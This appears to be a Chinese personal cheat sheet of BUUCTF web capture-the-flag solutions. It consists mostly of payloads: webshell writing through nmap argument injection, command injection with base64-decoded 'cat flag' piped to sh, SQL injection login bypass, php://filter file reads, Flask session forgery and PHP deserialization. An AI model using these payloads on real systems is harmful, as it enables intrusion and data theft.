BUUCTF web

只记录各种姿势

[BUUCTF 2018]Online Tool
?host=' -oG hausa.php '
/906fe1fa9626a4ca7f39e700abc2e596/hausa.php?hausa=system("cat ../../../../flag");

[GXYCTF2019]Ping Ping Ping
?ip=127.0.0.1;cat$IFS$1index.php
?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

[RoarCTF 2019]Easy Calc
node3.buuoj.cn:27363/calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

[GXYCTF2019]BabySQli
name:’ union select 1,”admin”,”6397887a55216b86387a94299937fd00″#(英文符号)
pw:hausa

[极客大挑战 2019]Secret File
1d9620ac-6889-454c-af53-5ec5043ce89e.node3.buuoj.cn/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

[ACTF2020 新生赛]BackupFile
823aca79-c8de-49a4-9050-52fff93fb44d.node3.buuoj.cn/index.php?key=123

[HCTF 2018]admin
flask session伪造
解码代码:!ao!ao :https://www.cnblogs.com/chrysanthemum/p/11722351.html
编码代码:noraj : https://github.com/noraj/flask-session-cookie-manager

[ZJCTF 2019]NiZhuanSiWei
?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:%22Flag%22:1:%7Bs:4:%22file%22;s:8:%22flag.php%22;%7D
读php文件:见上三